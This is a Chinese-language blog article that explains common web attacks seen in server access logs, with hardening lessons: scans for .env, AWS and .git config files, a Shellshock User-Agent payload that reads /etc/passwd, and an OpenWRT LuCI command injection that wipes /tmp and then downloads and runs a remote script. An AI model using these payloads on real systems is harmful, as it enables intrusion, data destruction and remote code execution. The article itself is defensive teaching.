互聯網滿是流矢暗箭。一旦一個公有IP暴露到公網馬上就會大量的惡意地址掃描、嘗試、攻擊和滲透。所以暴露再公網之前確保你主機上任何危險的端口（22，873，1433，1521，1521，2375，3306，3389，5423，6379，27017，271018）。當然除了安全加固和防護之外，需要學習一些攻擊的套路對我們做好安全也是很有必要的。所以本文蟲蟲給大傢介紹一下如何通過訪問日志來學習網絡攻擊的套路（所有的日志均來自線上Web服務器的訪問日志）。

憑證和配置發現

針對公網網站最常見的攻擊（掃描）是搜索憑證的目錄遍歷攻擊。其中最主要的似乎是尋找.env，可以由該文件直接發現一些配置機密信息，比如憑據和密碼、後端數據庫IP、目錄等。

攻擊者還會掃描其他可能的包含密碼等的文件，比如AWS憑證和配置文件（aws.yml），以及.git/config倉庫配置信息。

以及其他可能的公共目錄掃描。

經驗教訓：屏蔽一下對外公開的文件和目錄，最低限度的顯示對外透露的信息，包括代碼註釋，js配置信息可以考慮進行代碼混淆和加密。對必須公開工具或目錄，可以考慮添加一些身份驗證，並限制對特定IP地址的訪問。

shellshock攻擊

利用Shellshock漏洞的攻擊也常見，比如一下日志：

該漏洞利用使用有漏洞版本的bash執行CGI腳本的Web服務器（雖然CGI的Web現在已經絕跡了），該漏洞可以進行遠程代碼執行，攻擊者可以用它執行任意命令。當CGI程序啟動時，它會根據請求的內容設置環境變量，值得註意的是 HTTP_USER_AGENT內容中包含“() { :; }; ”內容時，bash會將其解釋為需要執行的函數。

分析上述日志，在這次特定的攻擊中，攻擊者通過發出GET訪問，其USER_AGENT字段包含：

() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd

其中 () { ignored; };部分定義了Bash函數。大括號內的內容是函數體。被忽略的命令是一個占位符；它不會影響執行，為了防止語法錯誤導致執行的中斷。

echo Content-Type: text/html; echo ;：這些命令是函數體的一部分。他們將HTTP響應的Content-Type標頭設置為“text/html”並回顯空行。

/bin/cat /etc/passwd：這是函數中嵌入的惡意命令。它嘗試使用cat命令顯示內容/etc/passwd文件，其中包含用戶帳戶信息。

如果攻擊成功，理論上攻擊者將獲得對/etc/passwd的信息，並擁有在服務器上執行任意代碼的機制。

與目錄遍歷攻擊一樣，攻擊者猜測常見目錄和路徑：

註入攻擊

LuCI註入

也有一些攻擊時針對特定的目標，比如下面的日志顯示攻擊目標為OpenWRT路由器的LuCI Web。該攻擊嘗試將命令註入表單的國傢/地區字段，該表單下載並執行托管遠程服務器的 hell腳本。

惡意代碼位於經過URL編碼的URL中。對URL進行解碼結果：

/cgi-bin/luci/;stok=/locale：LuC界面中CGI腳本的路徑。LuCI是一個基於 Web的界面，適用於OpenWRT路由器和類似的嵌入式設備。

?form=country&operation=write&country=：這些是傳遞給CGI腳本的參數。

$(cd /tmp; rm -rf *; wget xxx.xxx.xxx/tenda.sh; chmod 777 tenda.sh;./tenda.sh)：這是一個用執行的bash替換命令，並將輸出替換到 URL 中。該命令正在嘗試cd進入/tmp文件夾，刪除所有文件，從遠程服務器下載shell腳本並執行。

下載該腳本進行進一步調查，目標文件是一個惡意的二進制文件（並非shell腳本）。